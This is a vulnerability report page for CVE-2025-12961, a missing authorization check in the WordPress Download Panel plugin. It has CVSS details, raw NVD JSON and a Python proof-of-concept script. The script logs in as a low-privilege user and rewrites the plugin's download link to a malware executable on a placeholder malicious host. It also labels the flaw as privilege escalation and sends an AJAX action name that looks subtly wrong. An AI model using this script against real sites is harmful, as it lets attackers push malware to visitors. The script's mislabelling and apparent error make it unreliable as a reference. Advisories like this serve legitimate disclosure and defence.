Security Vulnerability Report
中文
CVE-2025-12961 CVSS 4.3 MEDIUM

CVE-2025-12961

Published: 2025-11-18 09:15:50
Last Modified: 2026-04-15 00:35:42

Description

The Download Panel plugin for WordPress is vulnerable to unauthorized settings modification due to a missing capability check on the 'wp_ajax_save_settings' AJAX action in all versions up to, and including, 1.3.3. This is due to the absence of any capability verification in the `dlpn_save_settings()` function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to arbitrarily modify plugin settings including display text, download links, button colors, and other visual customizations.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Download Panel plugin for WordPress <= 1.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12961 PoC - WordPress Download Panel Plugin Privilege Escalation # Target: WordPress with Download Panel plugin <= 1.3.3 target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com' username = sys.argv[2] if len(sys.argv) > 2 else 'subscriber' password = sys.argv[3] if len(sys.argv) > 3 else 'password' # Login to WordPress session = requests.Session() login_url = f'{target_url}/wp-login.php' login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } session.post(login_url, data=login_data) # Exploit: Modify plugin settings via AJAX without proper authorization ajax_url = f'{target_url}/wp-admin/admin-ajax.php' exploit_data = { 'action': 'wp_ajax_save_settings', 'settings[download_url]': 'https://malicious-site.com/malware.exe', 'settings[button_text]': 'Click here to download', 'settings[button_color]': '#ff0000' } response = session.post(ajax_url, data=exploit_data) if response.status_code == 200: print('[+] Settings modified successfully - Privilege escalation successful') print('[+] Malicious settings have been applied to the Download Panel plugin') else: print('[-] Exploitation failed')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12961", "sourceIdentifier": "[email protected]", "published": "2025-11-18T09:15:49.663", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Download Panel plugin for WordPress is vulnerable to unauthorized settings modification due to a missing capability check on the 'wp_ajax_save_settings' AJAX action in all versions up to, and including, 1.3.3. This is due to the absence of any capability verification in the `dlpn_save_settings()` function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to arbitrarily modify plugin settings including display text, download links, button colors, and other visual customizations."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/download-panel/tags/1.3.3/plugin.php#L50", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/download-panel/tags/1.3.3/plugin.php#L51", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e1a1df7e-1a57-45b3-a4b3-cb3218782ad9?source=cve", "source": "[email protected]"}]}}